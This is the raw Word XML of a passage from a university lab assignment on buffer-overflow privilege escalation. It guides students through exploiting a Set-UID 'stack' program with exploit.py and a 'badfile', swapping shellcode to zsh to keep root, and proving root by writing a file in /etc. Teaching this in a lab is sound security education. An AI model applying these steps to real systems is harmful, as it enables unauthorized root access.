    <w:p w14:paraId="60D72C4B" w14:textId="77777777" w:rsidR="00697D82" w:rsidRDefault="000B1AC9" w:rsidP="006203B4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Run the program </w:t>
      </w:r>
      <w:r w:rsidR="00C150F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>, and describe your observation</w:t>
      </w:r>
      <w:r w:rsidR="001E348F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you have successfully cause</w:t>
      </w:r>
      <w:r w:rsidR="000A7E72">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="001E348F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable program to </w:t>
      </w:r>
      <w:r w:rsidR="000A7E72">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r w:rsidR="001E348F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7E72">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="001E348F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A77751">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>shell program</w:t>
      </w:r>
      <w:r w:rsidR="000A7E72">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and explain why that happens</w:t>
      </w:r>
      <w:r w:rsidR="001E348F">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C055AD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD674E6" w14:textId="39599424" w:rsidR="00B03FED" w:rsidRPr="006203B4" w:rsidRDefault="002F2092" w:rsidP="006203B4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>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Also, d</w:t>
      </w:r>
      <w:r w:rsidR="00C055AD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>escribe if the shell has root privilege or not</w:t>
      </w:r>
      <w:r w:rsidR="00E73A34">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> (use </w:t>
      </w:r>
      <w:r w:rsidR="00E73A34" w:rsidRPr="00E73A34">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00E73A34">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to print out the effective UID</w:t>
      </w:r>
      <w:r w:rsidR="002967BF">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to justify the root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00E73A34">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C055AD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605420BC" w14:textId="24A7C30E" w:rsidR="003B4AC2" w:rsidRDefault="00CD4BFD" w:rsidP="003B4AC2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>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00325237" w:rsidRPr="00CD4BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">un </w:t>
      </w:r>
      <w:r w:rsidR="00325237" w:rsidRPr="00CD4BFD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidR="00325237" w:rsidRPr="00CD4BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to jump out of the shell program.</w:t>
      </w:r>
      <w:r w:rsidR="00325237">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C80743">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidR="00D46AE6">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="009124BE">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">the following </w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">command to link </w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2" w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2" w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2" w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="003B4AC2">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB38C7" w14:textId="48032106" w:rsidR="00395A3B" w:rsidRDefault="003B4AC2" w:rsidP="003B4AC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo ln -sf /bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54083FEE" w14:textId="352D6998" w:rsidR="00FE4F45" w:rsidRDefault="003B332A" w:rsidP="00413385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Since </w:t>
      </w:r>
      <w:r w:rsidRPr="0059384C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>dash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> will automatically drop root privilege in a Set-UID process, please update the shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00170E5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00170E5B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>to invoke</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00170E5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00170E5B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>instead of</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00170E5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">After that, remove the </w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> created (</w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="00655E1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f badfile</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">), and rerun the python program </w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="004A46FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create</w:t>
      </w:r>
      <w:r w:rsidR="00413385">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> new</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00370266" w:rsidRPr="004A46FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="00370266">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00413385">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Then rerun the Set-UID program </w:t>
      </w:r>
      <w:r w:rsidR="00413385" w:rsidRPr="00413385">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidR="00413385">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>. Describe your observation if you have successfully cause</w:t>
      </w:r>
      <w:r w:rsidR="000D01D7">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00413385">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable program to execute a root shell. If yes, please </w:t>
      </w:r>
      <w:r w:rsidR="00683E77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>run the following code</w:t>
      </w:r>
      <w:r w:rsidR="00C52D0D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the root shell</w:t>
      </w:r>
      <w:r w:rsidR="00683E77">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to justify the root privilege:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C6867C" w14:textId="7EBD0763" w:rsidR="00683E77" w:rsidRDefault="00D95E6C" w:rsidP="00D95E6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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E66755">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>udo touch /etc/labassignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B81763" w14:textId="77777777" w:rsidR="0074398A" w:rsidRDefault="00C220EE" w:rsidP="00D95E6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4F45">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "This is lab assignment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4F45">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>" &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E66755">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/etc/labassignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D166CA" w14:textId="5BD75EBF" w:rsidR="00D95E6C" w:rsidRPr="00D46AE6" w:rsidRDefault="0074398A" w:rsidP="00D95E6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidRPr="00E66755">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/etc/labassignment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00C220EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9DC0E" w14:textId="4A8D1BF4" w:rsidR="00630061" w:rsidRPr="00630061" w:rsidRDefault="00630061" w:rsidP="00630061">
      <w:pPr>
        <w:spacing w:before="240" w:after="240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3. </w:t>
      </w:r>
      <w:r w:rsidR="004B6361">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632393E1" w14:textId="1B61F47A" w:rsidR="002F33D4" w:rsidRPr="00436547" w:rsidRDefault="008E6C8A" w:rsidP="00F76915">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>You need to submit a detailed lab report</w:t>
      </w:r>
      <w:r w:rsidR="00C7126D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">with screenshots and descriptions what you have done and what you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00436547">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>observed.</w:t>
      </w:r>
      <w:r w:rsidR="00404448" w:rsidRPr="00436547">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> You also need to provide explanation to the observations</w:t>
      </w:r>
      <w:r w:rsidR="00853C9D" w:rsidRPr="00436547">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F33D4" w:rsidRPr="00436547" w:rsidSect="00B74F6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29B9" w14:textId="77777777" w:rsidR="00CB13D0" w:rsidRDefault="00CB13D0" w:rsidP="00B74F64">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7CFCC1D1" w14:textId="77777777" w:rsidR="00CB13D0" w:rsidRDefault="00CB13D0" w:rsidP="00B7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868066"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="79AE15FE" w14:textId="49AEB8EA" w:rsidR="00B74F64" w:rsidRDefault="00B74F64" w:rsidP="00515B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A4CF36" w14:textId="77777777" w:rsidR="00B74F64" w:rsidRDefault="00B74F64" w:rsidP="00B74F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1164958"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="5B525300" w14:textId="0A7656BE" w:rsidR="00B74F64" w:rsidRDefault="00B74F64" w:rsidP="00515B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06FE30" w14:textId="77777777" w:rsidR="00B74F64" w:rsidRDefault="00B74F64" w:rsidP="00B74F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6B90F" w14:textId="77777777" w:rsidR="00CB13D0" w:rsidRDefault="00CB13D0" w:rsidP="00B74F64">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="58D20481" w14:textId="77777777" w:rsidR="00CB13D0" w:rsidRDefault="00CB13D0" w:rsidP="00B74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9386" w14:textId="082F78CC" w:rsidR="001D3321" w:rsidRDefault="001D3321">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="09D059D1" w14:textId="711BE25A" w:rsidR="00B74F64" w:rsidRPr="00B74F64" w:rsidRDefault="00B74F64">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs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D1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D464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68F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBE2B5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892443"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A762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4617E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4B0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63E21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C681E1A"/>
    <w:lvl w:ilvl="0" w:tplc="D278F55C">
      <w:start w:val="1"/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250BA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="380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81230"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBA45F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BBB45DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1328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070659">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="148981831">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="180290859">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1723483608">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="589855349">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1847938474">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1772891365">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1120761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64"/>
    <w:rsid w:val="000017F3"/>
    <w:rsid w:val="00015C4C"/>
    <w:rsid w:val="00016314"/>
    <w:rsid w:val="000228D8"/>
    <w:rsid w:val="0002561C"/>
    <w:rsid w:val="00034602"/>
    <w:rsid w:val="00035832"/>
    <w:rsid w:val="000402FC"/>
    <w:rsid w:val="00045B29"/>
    <w:rsid w:val="00052F33"/>
    <w:rsid w:val="00053899"/>
    <w:rsid w:val="00053D2A"/>
    <w:rsid w:val="00055BA1"/>
    <w:rsid w:val="0005793B"/>
    <w:rsid w:val="00061DBB"/>
    <w:rsid w:val="0006259A"/>
    <w:rsid w:val="0006297F"/>
    <w:rsid w:val="00071694"/>
    <w:rsid w:val="00071F6C"/>
    <w:rsid w:val="00073C43"/>
    <w:rsid w:val="00075754"/>
    <w:rsid w:val="000803F1"/>
    <w:rsid w:val="00081CCB"/>
    <w:rsid w:val="00093140"/>
    <w:rsid w:val="000972E4"/>
    <w:rsid w:val="000A0F71"/>
    <w:rsid w:val="000A25F4"/>
    <w:rsid w:val="000A3435"/>
    <w:rsid w:val="000A3BDE"/>
    <w:rsid w:val="000A3ED7"/>
    <w:rsid w:val="000A7E72"/>
    <w:rsid w:val="000B1AC9"/>
    <w:rsid w:val="000B7042"/>
    <w:rsid w:val="000B7C89"/>
    <w:rsid w:val="000D01D7"/>
    <w:rsid w:val="000D7E0E"/>
    <w:rsid w:val="000E0CA2"/>
    <w:rsid w:val="000E3143"/>
    <w:rsid w:val="000F5031"/>
    <w:rsid w:val="000F5C77"/>
    <w:rsid w:val="000F6342"/>
    <w:rsid w:val="001027CC"/>
    <w:rsid w:val="001057B9"/>
    <w:rsid w:val="00105E55"/>
    <w:rsid w:val="001124C8"/>
    <w:rsid w:val="001145C2"/>
    <w:rsid w:val="00123F88"/>
    <w:rsid w:val="00127043"/>
    <w:rsid w:val="00130240"/>
    <w:rsid w:val="00130AEF"/>
    <w:rsid w:val="00141A99"/>
    <w:rsid w:val="00144710"/>
    <w:rsid w:val="00145627"/>
    <w:rsid w:val="00147668"/>
    <w:rsid w:val="00150FDD"/>
    <w:rsid w:val="001540A7"/>
    <w:rsid w:val="00164322"/>
    <w:rsid w:val="00170E5B"/>
    <w:rsid w:val="001726BE"/>
    <w:rsid w:val="001730E9"/>
    <w:rsid w:val="00176E9C"/>
    <w:rsid w:val="00192C82"/>
    <w:rsid w:val="00194DBE"/>
    <w:rsid w:val="00197B21"/>
    <w:rsid w:val="001A5982"/>
    <w:rsid w:val="001B1308"/>
    <w:rsid w:val="001B3B4D"/>
    <w:rsid w:val="001C241B"/>
    <w:rsid w:val="001C7DD9"/>
    <w:rsid w:val="001D3321"/>
    <w:rsid w:val="001D6F6C"/>
    <w:rsid w:val="001E348F"/>
    <w:rsid w:val="001E5ACA"/>
    <w:rsid w:val="001E7AE8"/>
    <w:rsid w:val="001F7880"/>
    <w:rsid w:val="002013D8"/>
    <w:rsid w:val="0020334F"/>
    <w:rsid w:val="00205575"/>
    <w:rsid w:val="00205AF1"/>
    <w:rsid w:val="002151F7"/>
    <w:rsid w:val="00223A86"/>
    <w:rsid w:val="002272FA"/>
    <w:rsid w:val="00231D38"/>
    <w:rsid w:val="00235E5F"/>
    <w:rsid w:val="002373C6"/>
    <w:rsid w:val="002456DC"/>
    <w:rsid w:val="00247AFD"/>
    <w:rsid w:val="00250D8B"/>
    <w:rsid w:val="00251CF5"/>
    <w:rsid w:val="00255B41"/>
    <w:rsid w:val="00256082"/>
    <w:rsid w:val="002602ED"/>
    <w:rsid w:val="00262057"/>
    <w:rsid w:val="00266E78"/>
    <w:rsid w:val="00267223"/>
    <w:rsid w:val="00271D72"/>
    <w:rsid w:val="00272E00"/>
    <w:rsid w:val="00274D56"/>
    <w:rsid w:val="00275A83"/>
    <w:rsid w:val="00277530"/>
    <w:rsid w:val="00291414"/>
    <w:rsid w:val="002941FD"/>
    <w:rsid w:val="002967BF"/>
    <w:rsid w:val="002A5321"/>
